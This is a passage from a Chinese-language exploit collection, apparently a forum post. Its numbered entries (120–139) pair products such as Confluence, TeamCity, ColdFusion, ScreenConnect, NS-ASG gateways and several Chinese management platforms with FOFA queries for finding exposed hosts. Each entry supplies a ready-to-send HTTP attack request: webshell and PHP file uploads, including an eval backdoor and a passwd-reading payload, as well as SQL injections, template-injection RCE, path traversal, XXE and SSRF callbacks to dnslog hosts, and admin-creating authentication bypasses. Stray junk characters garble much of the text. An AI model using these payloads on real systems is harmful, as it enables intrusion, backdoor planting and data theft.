. d# I# X9 w) L1 ^, K: L. X$ }# T7 t8 T
120. 北京百绰智能S40管理平台导入web.php任意文件上传
9 h9 W3 Y5 [( N1 T' j! h6 y* u( U) ZCVE-2024-12539 A3 s% K S3 r! i
FOFA:title="Smart管理平台"
4 Z2 N% @- z: E0 N& \6 u1 M( YPOST /useratte/web.php? HTTP/1.1. {9 ?9 X- h* o& m2 k% U9 D
Host: ip:port
( B8 G$ {) q" {% k4 A, @1 qCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
% X# @7 `8 A6 M$ G% ]User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko5 `* u& M! P- v& k5 {( K/ q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 @, Z# n! l" h8 w. b! l/ CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 E! V" i- g. F, l) a
Accept-Encoding: gzip, deflate' B2 b, F2 F" T
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793280 R4 @' [9 N) c& c* Z+ m+ q+ z; T
Content-Length: 597
0 u0 {* p" t K: vOrigin: https://ip:port
& Q+ `" L1 }. _: Y" \Referer: https://ip:port/sysmanage/licence.php
' B. X* L4 `. E1 ZUpgrade-Insecure-Requests: 1* s; h* M u1 W# c p8 @* g6 v3 s; Y
Sec-Fetch-Dest: document
9 w+ i. V# D4 h. o, X% nSec-Fetch-Mode: navigate
( m6 `- Q& C! A* QSec-Fetch-Site: same-origin
% H# Y. R- Q- C* r/ {! XSec-Fetch-User: ?1$ b V: b- c0 a7 R3 ]7 l
Te: trailers
8 d0 P8 v% D- t. tConnection: close
! a# Y* S' B$ }$ f9 p0 w$ ?+ p& l/ U+ V$ F0 r- ?& J
-----------------------------42328904123665875270630079328
5 t" J2 W9 C4 qContent-Disposition: form-data; name="file_upload"; filename="2.php"9 p" t. a6 t V% ~4 I, n2 I% Y7 x
Content-Type: application/octet-stream; W. d4 F: i, d1 }6 e3 Z, x
3 [6 |% q2 Z( c( j* y# Y<?php phpinfo()?>" Z! B; v' C: q; ]8 a
-----------------------------423289041236658752706300793281 {. }; U9 B: Y: P
Content-Disposition: form-data; name="id_type"' n& d6 H. ^2 j; w6 L6 H
, r% ?9 \; E# J4 `* A/ Z7 w
1* I) J; M5 m. V [
-----------------------------42328904123665875270630079328
+ b* ^4 F. C6 ?1 E( A5 zContent-Disposition: form-data; name="1_ck"& r/ G1 }* C K4 _9 Y5 {3 A! G* Y
9 Q, c% N( L5 h" G1_radhttp5 ~7 `, m, h( p" h `
-----------------------------42328904123665875270630079328# b/ A' T$ L: K+ X' k9 p
Content-Disposition: form-data; name="mode"
! c( W; _ o, Y; Y: V/ ?$ m3 ^- c; z7 q4 A
import
# {# @% _ I& t# P-----------------------------423289041236658752706300793288 s( B$ k( B) J1 n) T6 k! M
) E& m* X* h3 \) B7 {- P! k5 H: g, {: x7 x+ T- i6 x1 y
文件路径/upload/2.php
! H8 s- G/ q4 Q: ~$ q
# H! s3 H; h, Z121. 北京百绰智能S42管理平台userattestation.php任意文件上传
7 ]9 Q: v7 `/ x1 DCVE-2024-1918
' V5 l4 c5 Z4 ~. `- f% g- hFOFA:title="Smart管理平台"
7 a1 R6 n0 N. B, H) XPOST /useratte/userattestation.php HTTP/1.16 S: `; C7 T/ K( S# g
Host: 192.168.40.130:8443) K6 L8 ?4 B+ L( @
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50. ~- ~" V9 V% R/ B
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko) R7 K5 c3 W0 M4 W7 _9 i5 h4 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- w4 Z/ k' j4 }; ?0 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 W1 b+ H8 d4 S! ~
Accept-Encoding: gzip, deflate
) P* M* c8 @- v; bContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328' p1 t. k6 J) @# r4 l! J8 Z
Content-Length: 5926 b/ W! W, P0 G' @. H
Origin: https://192.168.40.130:84437 b- V; L3 Z+ r) D$ ?$ Z: |
Upgrade-Insecure-Requests: 1( W4 O' `( W5 n2 U5 R1 ], a3 {
Sec-Fetch-Dest: document
8 `5 i9 T$ V, K& a8 C' K1 {; QSec-Fetch-Mode: navigate+ H; E b# I' E- m
Sec-Fetch-Site: same-origin8 Q2 U& d; f) f
Sec-Fetch-User: ?1
9 {! I" z4 {1 a, k3 r% ]* Y2 dTe: trailers7 I! L$ f" {% r6 _
Connection: close# t3 Y' j' e3 [5 M6 g
6 o5 B! l) M" v-----------------------------423289041236658752706300793286 Z7 D& x4 q) o
Content-Disposition: form-data; name="web_img"; filename="1.php"1 X% P1 u# d* {+ o5 r
Content-Type: application/octet-stream
$ J( P" \( q8 q( b1 s( H6 }1 i% z+ ^6 l3 r! Q! i: W3 X
<?php phpinfo();?>) f7 ]: N0 \3 @8 b% i
-----------------------------42328904123665875270630079328
7 H% v+ I8 P7 s& A5 ]. \9 Z. KContent-Disposition: form-data; name="id_type"1 ?4 T! B3 o! ~/ E8 @5 `2 S0 d8 D
9 x( f D1 L: e' _7 h+ ]
1
7 W v. a+ e' ?- Q- R: x+ r4 p-----------------------------42328904123665875270630079328
$ y7 Y" j0 _# @1 }Content-Disposition: form-data; name="1_ck"
" A* t# L1 T% t# W$ c+ X) l2 i: H( f% u1 D2 _4 U5 {
1_radhttp
/ V+ ]: p' a* i4 }-----------------------------42328904123665875270630079328
# J+ c! ]6 \$ b) T& _# {1 C6 XContent-Disposition: form-data; name="hidwel"
! i4 O: w! x: B
6 ]; ~) K. k' Z Y3 ]$ \set
/ y1 y/ p. z( _6 V4 J7 X& m$ q7 O-----------------------------423289041236658752706300793283 ?) i' D8 c8 ?3 s4 Y0 N7 C
; l+ _/ V) N5 o1 ?( m! k
) `. u5 K. K. h# Aboot/web/upload/weblogo/1.php
$ H* ~9 M; R8 h! I6 _' V& @
0 `$ J, b- m# O5 ~ s% p6 l( ^: g122. 北京百绰智能s200管理平台/importexport.php sql注入
; N7 t0 k6 b- {: u: d# P* k! n/ MCVE-2024-27718FOFA:title="Smart管理平台"3 V4 }- H4 ~7 P6 P" O% K
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()4 _+ x3 e% J/ q5 K& G5 q: f
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
. U1 t L* Z( z& \. X6 C7 c) eHost: x.x.x.x; s+ y; E$ e2 s
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
4 E: y) s+ y- ~9 N3 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
, I, u S% u, ]$ ~, G, mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 ]) e) x# ?9 JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 I* U" |: A/ x8 K2 FAccept-Encoding: gzip, deflate, br
" m& V9 Q& v5 H+ J( R9 |Upgrade-Insecure-Requests: 1
1 u3 H% ?! ^5 s, B+ q- F0 n* FSec-Fetch-Dest: document: z* `' e; A, b- |6 Y, n- d( G' H
Sec-Fetch-Mode: navigate
4 ^ |% e2 U5 ISec-Fetch-Site: none: o. f9 {8 [8 t5 Q. e8 [3 { F
Sec-Fetch-User: ?1' U& `* i1 h4 T/ H0 O
Te: trailers
) x: F. _5 |4 F) t; d$ q6 m* yConnection: close: d/ B) D- a% g8 g1 n9 V
8 M e$ ~# i. H, o7 a
4 G2 t8 j7 I) g# y5 r# ?
123. Atlassian Confluence 模板注入代码执行6 I9 }! [. m9 `
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"5 y* Z }+ u2 P, O7 v: t2 B
POST /template/aui/text-inline.vm HTTP/1.1 C/ N8 v" H: h0 M' {" g- o' z! N% Y
Host: localhost:8090: N, r1 d& q B7 L# V
Accept-Encoding: gzip, deflate, br+ L# u* B* C/ u
Accept: */*3 @' ?9 E& U* K9 ?
Accept-Language: en-US;q=0.9,en;q=0.88 s% y4 W: h( `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.367 U0 i8 O s7 G+ R) h, ?$ ^% I7 }( M" v
Connection: close
1 V; r4 c ^# l& ?# L6 X; F) uContent-Type: application/x-www-form-urlencoded
) ~ X, @# f) V# w. \6 \4 ~2 D4 b3 o
0 ^6 S( r- S- I7 ]) W. rlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))9 T3 B6 E3 t' T$ \# Z" J4 |
9 w7 I# w( P: [2 ^2 l
8 H' f7 s; P2 Y+ w, {; m124. 湖南建研工程质量检测系统任意文件上传( m+ U0 n+ F# |8 T6 H2 D" e/ v
FOFA:body="/Content/Theme/Standard/webSite/login.css"
. l% s/ Q f* u# ?& X% \6 _POST /Scripts/admintool?type=updatefile HTTP/1.16 x/ P6 Z' |9 ~5 d: h
Host: 192.168.40.130:8282( k5 |' k: `, |* S/ r X) G9 ^9 ?
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 s9 l# N7 t& K: V7 B$ K- d3 {Content-Length: 72
; D5 v& q/ |3 A) _/ nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
3 V6 L5 ~" w3 z! A8 s4 _Accept-Encoding: gzip, deflate, br
) ?: g8 w+ R* p3 X+ `, SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! h6 f- I, L. j9 O/ iConnection: close, P$ v& I8 F" b- ?
Content-Type: application/x-www-form-urlencoded4 x, z& f: g3 J$ U4 P- `0 ^, _3 ^
+ k$ g Q0 A# w4 p: Y; ofilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
7 O% Q1 [6 I2 ]- e6 k, Y+ I& t8 h: v. W2 L. j$ w: z' a! d
2 z. j" ^8 b; J8 l) A( j
http://192.168.40.130:8282/Scripts/abcgcg.aspx8 L* F& m5 W+ u/ [- ~
4 O7 F; n, T/ P$ h- s125. ConnectWise ScreenConnect身份验证绕过
7 C3 m) m$ p& x1 l) nCVE-2024-1709 T$ Z. h E, g" r- V
FOFA:icon_hash="-82958153"0 z+ a5 [7 ^) N- p0 @
https://github.com/watchtowrlabs ... bypass-add-user-poc" ]& v; I0 K5 \
! {' ~8 J/ l. y+ q
$ p, C/ A( v! v( M使用方法9 [9 ?4 k0 T ]$ H& |
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!9 K5 ?! l; w( M% p
( R/ V& ~% \, `( y, C
" @2 @8 P) N' u; p- E* g) h创建好用户后直接登录后台,可以执行系统命令。
4 {1 H, ]9 k1 o9 F$ f+ m" ?1 C( O$ g8 {6 E* A
126. Aiohttp 路径遍历
- s a' ^& j4 QFOFA:title=="ComfyUI"
5 A: M. q8 B& k% y$ \" ~GET /static/../../../../../etc/passwd HTTP/1.19 L( O5 B3 L6 O2 q! Y3 Q
Host: x.x.x.x' k; P) R, Y4 }( L. Z- A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
; W: {" b8 E0 `; _Connection: close
) X3 j/ _& t& o+ U( B2 E3 i" H3 k& CAccept: */*
3 `/ d5 p0 X2 AAccept-Language: en! B6 y' u4 C7 i8 n1 z( ]
Accept-Encoding: gzip
4 @$ e) E- C0 o* H0 e( Y' q0 V3 g7 h
4 S# K8 M0 q7 m1 o
4 f/ a! a9 k: q' |6 I( R+ p127. 广联达Linkworks DataExchange.ashx XXE) z6 l7 r; X5 ?
FOFA:body="Services/Identification/login.ashx"
% b. s" u6 w; GPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
3 ^( K4 t5 k, a- ~) SHost: 192.168.40.130:88888 {2 p9 F" r j9 ]7 E9 m: N/ n# I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.362 h" }/ }+ C2 o" z) }
Content-Length: 4159 Y0 C7 d: }! `% Z/ D/ J! `9 C6 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" D; z Q1 j( o% f5 M
Accept-Encoding: gzip, deflate# E( X( J! T2 I o6 L/ a
Accept-Language: zh-CN,zh;q=0.9) N, o0 d7 `' }6 b2 E" H& i4 u6 I
Connection: close
$ l6 }$ f* \" E: ?; d+ p9 V- ~Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
1 U p6 Y0 x. H" `: Q; S! c# p( cPurpose: prefetch
9 P/ o- `" V! |" O' TSec-Purpose: prefetch;prerender! k) Q; x0 K- r Z8 r2 l" y
) |" m2 {, u! l1 I
------WebKitFormBoundaryJGgV5l5ta05yAIe02 z! I- {. e3 r# o# k
Content-Disposition: form-data;name="SystemName"+ c9 z. a2 y: x" Q1 t; @6 E) u. T% R( D
$ U( C/ `$ Q- Z9 v9 X" z' {2 d( L
BIM
% v/ g1 `! J- y+ M: V1 ]------WebKitFormBoundaryJGgV5l5ta05yAIe0
# R" B: ?7 M. }! X$ w* F% PContent-Disposition: form-data;name="Params": q7 s6 H* b9 w9 s& Y6 }# L
Content-Type: text/plain$ c7 u) p9 a1 c: x) ~7 Q
0 y+ a7 {- V0 e1 j5 l<?xml version="1.0" encoding="UTF-8"?>
- D W3 A- k6 B, U<!DOCTYPE test [
& _; o' G! R0 d" C6 J; T<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">6 Y) d: y# W E! Y k
]0 W* u' e% K( @. J* t
>
) N" ^+ z% V8 K. ]3 y0 J<test>&t;</test># a+ s' g! V P' h5 Y2 p1 q
------WebKitFormBoundaryJGgV5l5ta05yAIe0--; O$ R; W6 u! q, ~0 c( I
7 B( S! }- _6 Z6 x x9 [1 J
3 ] }( @4 j$ x- u
( D) W0 c8 M$ o% ^1 o; |
128. Adobe ColdFusion 反序列化 A: o, o$ o+ k6 [" c/ P$ U2 Q
CVE-2023-38203/ W% \% I. i0 D6 B
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本). `# W# X. g( e) l/ d
FOFA:app="Adobe-ColdFusion"+ n j& a0 E. C7 I
PAYLOAD
& M) T5 y( |* ?
* k$ n; k* W7 ~% m129. Adobe ColdFusion 任意文件读取. M: q0 l$ ? O D: d
CVE-2024-20767
' p( r9 g5 ^/ \ _0 L& ~3 s: MFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
$ W3 d. K1 Z- _+ H( s% A% E第一步,获取uuid0 x, N& x. z" x+ W) K: V! `
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.11 Y* I3 V; {5 `( z" b! r
Host: x.x.x.x3 p! ?% [3 I& y1 W5 I6 f @ B) d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: \ \2 ]$ q; W, C, c- CAccept: */*6 a6 _4 Z% T+ U$ i6 d! _3 u. ]
Accept-Encoding: gzip, deflate
/ h& L3 I, M1 t/ j5 q& g' ?( FConnection: close
* \1 t1 g5 P4 n. i" z& T; S5 }# Y# d& y, `* a/ s
! e0 y- x2 W5 m( Z7 q" k第二步,读取/etc/passwd文件, o9 i% k" A8 s6 Z+ ?
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
2 ]2 T' O( K, m/ A6 hHost: x.x.x.x
) E7 G! r4 a( R) o/ iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: a1 f3 e$ E& U0 B7 N( L/ U- HAccept: */*: d" S3 s. X1 e/ V" ~& I: k+ Z2 k
Accept-Encoding: gzip, deflate4 a C ]' ]" g1 E
Connection: close2 n- X! k4 k: i0 r: t
uuid: 85f60018-a654-4410-a783-f81cbd5000b96 }5 E$ y6 B* Z6 `( ?; ~$ B# Q& U
4 k0 B q. y" k- E @2 b
) @" W/ y: J6 ]' K2 x1 V130. Laykefu客服系统任意文件上传/ N! f! h4 _4 u3 D3 d" G
FOFA:icon_hash="-334624619") d/ P' j: k# _" r5 {# D. K: U: o# K
POST /admin/users/upavatar.html HTTP/1.1
+ Z6 j: J8 h( }, d8 ^; DHost: 127.0.0.1
5 I/ b! H# q0 o9 P: rAccept: application/json, text/javascript, */*; q=0.01. u, ]* i; G( g4 W
X-Requested-With: XMLHttpRequest
4 x* p, Y- G6 ~User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
+ w; f0 G. |/ `2 FContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
- f* N! o8 ]/ V1 X7 M6 GAccept-Encoding: gzip, deflate6 Q6 A* o6 D1 B
Accept-Language: zh-CN,zh;q=0.9' {5 B8 | g# c2 q( ?4 |
Cookie: user_name=1; user_id=3
" [4 V# i5 `0 L8 ~; H r" I ~Connection: close/ K- c5 ^7 r3 O0 R5 ]; `/ u
4 ]7 D% r) C& {& e------WebKitFormBoundary3OCVBiwBVsNuB2kR
8 L/ W$ p+ R! D- tContent-Disposition: form-data; name="file"; filename="1.php"
0 \3 I G1 Q8 i9 x4 MContent-Type: image/png. }3 ~2 r; U" T, ? ^
: v7 D7 {! l- |: Z# o$ s<?php phpinfo();@eval($_POST['sec']);?>+ E3 R: ~4 s) ^$ Z
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
4 c" w3 V0 n6 }4 l0 m, e1 a/ S/ r+ }! A$ s( L s
% @) u$ J) o$ y: W# i, j
131. Mini-Tmall <=20231017 SQL注入8 b8 N0 ?- C7 A1 R1 a! k4 p
FOFA:icon_hash="-2087517259"7 X7 {/ v* u l
后台地址:http://localhost:8080/tmall/admin7 r& _ E& O0 R# L5 T4 x- _
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)1 [/ }2 P4 s @( p) b
$ u# G8 ?5 C0 `; E4 M5 N
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过/ p5 ]9 d& \4 o2 n* _( n
CVE-2024-27198
x+ G& ]. N( m2 k% MFOFA:body="Log in to TeamCity"0 T3 |* P d1 H
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
( y/ c) A8 v- a. w7 o! W" U& OHost: 192.168.40.130:8111 d& [7 I) u0 B( h |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 C# Y; E+ A1 `! `( t" [ _
Accept: */*
! ?/ _9 M; i) C) NContent-Type: application/json, i( f" F5 O. }
Accept-Encoding: gzip, deflate0 r+ Y- g) ~$ O
. U; y- T$ ]6 V E% h& [2 q
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}# |2 G: j8 e9 t/ ]0 [
. d" B0 J6 `9 q. |2 }
- w0 m7 N D& UCVE-2024-27199( N! s' u6 Q% x+ S0 ~
/res/../admin/diagnostic.jsp
! ]$ B" v9 t$ `* v' E$ j" x/.well-known/acme-challenge/../../admin/diagnostic.jsp
! I/ W' b( u, q/update/../admin/diagnostic.jsp2 }$ a* F( ^5 I
6 _/ c# i: W! F' b0 b" E) C8 \* f! j v4 O
CVE-2024-27198-RCE.py# G; l9 x! i; M( J$ {
" j- f1 }$ Y) \( W9 w0 P133. H5 云商城 file.php 文件上传) c, Z8 }1 p2 n# l
FOFA:body="/public/qbsp.php"7 [9 \9 S, x3 t4 d: s$ p/ Y5 s
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1& K. T* T5 N. E4 b
Host: your-ip
3 A" y* u2 O* ?- kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. y2 Z5 n/ X( Z& lContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx' {4 f8 Y7 b: c; E
$ a% C# K; T( }$ c2 p
------WebKitFormBoundaryFQqYtrIWb8iBxUCx2 x: W/ Y4 o" S/ G W5 L$ A
Content-Disposition: form-data; name="file"; filename="rce.php", O1 y" W) Q' X5 h* {
Content-Type: application/octet-stream4 ~# g0 `% |& t) v) i) K) b
. V- t6 S. ?% g3 a. H g<?php system("cat /etc/passwd");unlink(__FILE__);?>
@4 B: ^- c1 W------WebKitFormBoundaryFQqYtrIWb8iBxUCx--3 C: f& M3 i4 R2 Z9 I+ [, z
3 u2 A+ S# z) i5 `
: f4 x: o2 Y; g1 ?) T* x; U( Q& m/ W2 t1 [1 k/ [5 @
134. 网康NS-ASG应用安全网关index.php sql注入2 a8 |5 W7 G7 U2 n8 D# c. |5 ^
CVE-2024-23302 X" R# K+ q- T/ a7 E
Netentsec NS-ASG Application Security Gateway 6.3版本
! K' W: o. J" }. iFOFA:app="网康科技-NS-ASG安全网关"! v, L& t) ^- T% D
POST /protocol/index.php HTTP/1.17 O' t* E- R s& S4 S' j
Host: x.x.x.x' x1 b) ?* N5 w n$ j
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
- ~3 ~" O; [/ a, ?% k; ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.03 V5 l8 H. a2 T! |6 \# O
Accept: */*4 m f( L- q1 p( F# d' S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 ]( m3 `9 S$ B1 MAccept-Encoding: gzip, deflate
" O* S& d0 S& Z0 P7 E7 [: a% x- tSec-Fetch-Dest: empty7 @ c" V) F! h; N
Sec-Fetch-Mode: cors2 [. G" x4 ]! E( ]' E% Y* V
Sec-Fetch-Site: same-origin
7 N. u( o/ L4 m$ E. ATe: trailers
/ r7 H+ c0 z- n7 |! _1 {Connection: close6 N2 f5 n/ c7 A. y+ Y
Content-Type: application/x-www-form-urlencoded3 j$ c1 P# ~& A+ |
Content-Length: 263 n: `0 I( f" k, K% I. x" B. k
$ E* {. G( z5 \9 {. A6 q' sjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}5 I2 U z% q2 C$ [6 x- w+ B
( Z% q) r( n* R9 a2 U' c! p% d
# \9 E* D4 V3 h4 s( {4 {135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入) B$ G. J. I, m
CVE-2024-2022
3 y# A- U) W/ b# PNetentsec NS-ASG Application Security Gateway 6.3版本0 l# ~, e0 R( ~$ c( x7 S) P0 r
FOFA:app="网康科技-NS-ASG安全网关"8 l% L7 N7 o. v" N# f
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
1 f# l. F$ T( Y9 o1 z0 UHost: x.x.x.x: A9 P1 f2 {; k9 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 Q) P: _2 @$ |5 P6 u9 U5 k% \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 A- c* H# z, ?7 n$ I: UAccept-Encoding: gzip, deflate
9 b+ L* c& N/ ^( A0 d+ TAccept-Language: zh-CN,zh;q=0.92 c0 S3 X# K1 Z" _9 d6 m
Connection: close+ a" @ k3 m: j3 I' A
. }$ ~2 I+ O$ n8 z4 h
9 g. O( n' G$ L- @( r; s
136. NextChat cors SSRF+ H& \7 U$ S+ X' i8 G
CVE-2023-497855 d9 k9 P+ z, J& k" i
FOFA:title="NextChat"# M- r; X2 C- p7 z0 Y# M, D, I5 \
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.19 t; ]$ c$ j8 Q; s8 p+ y
Host: x.x.x.x:10000
h( v6 \' p" \6 D$ pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& s* l! M, P9 |9 ] tConnection: close7 W) _3 g1 d/ [( u1 y8 t+ Z
Accept: */*& P4 E# }( s+ z* @
Accept-Language: en
, Z4 G# P5 s e lAccept-Encoding: gzip' P8 f! v( S2 S8 ? r
w% U3 l5 X% _8 s3 c1 O
$ S( T3 p4 q$ S8 J137. 福建科立迅通信指挥调度平台down_file.php sql注入
% @4 }, T$ h; C" JCVE-2024-2620
& V( S+ q+ v, v' k8 yFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; y! e. ]! X; ]& bGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
6 P6 a: G' u2 G7 ~5 BHost: x.x.x.x
0 f$ Z. P$ Z+ n( F# I" k& CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 V: I/ c/ P2 E1 p1 ~# m d( e$ s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 L- L% O# S% d; ~9 b# {9 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 p* A' [% w) A# t6 k- y
Accept-Encoding: gzip, deflate, br
# C$ _6 W3 k# x# y/ P$ d+ yConnection: close8 L- u/ p6 o& ^: ^% H
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj" l2 O4 z: @9 t9 s
Upgrade-Insecure-Requests: 1: r6 L. Y& \) N0 }3 a; ^1 {
7 A3 x$ ]9 o& f$ g( m
& z5 Q7 f3 n( m/ J6 q0 v138. 福建科立讯通信指挥调度平台pwd_update.php sql注入$ g& D! a& h6 j; Q( |
CVE-2024-2621/ b7 c. s, b8 z% R
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"9 A( T% |! _8 O. O
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1& b( i- l: |3 l, g6 x
Host: x.x.x.x; [7 O: ^/ H R% S5 I O( H+ W: f! F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 d8 _0 g0 L. t, g! |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ w: t8 h8 y5 i [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 r+ Z- |4 q* [5 @0 `5 O
Accept-Encoding: gzip, deflate, br
; e: s' [* N/ c, Z( {Connection: close5 A0 F' C$ {3 [9 a" Q' ~* n# x, e
Upgrade-Insecure-Requests: 10 P" X0 h2 l7 k2 b C
% Y ~: A* x* k7 H9 `3 g; p B, `
; M% {* E. a3 q6 s& X3 n( E- O
139. 福建科立讯通信指挥调度平台editemedia.php sql注入' p5 \/ S! ]9 K* p# O9 a. }
CVE-2024-2622
; w0 s& H) W$ FFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"5 C3 z; ~* X0 f' q1 P. L, m) M
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
5 o, p+ O6 U. e0 [. b* S" J3 cHost: x.x.x.x
6 N4 C9 Y% u- W* T7 a2 { [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
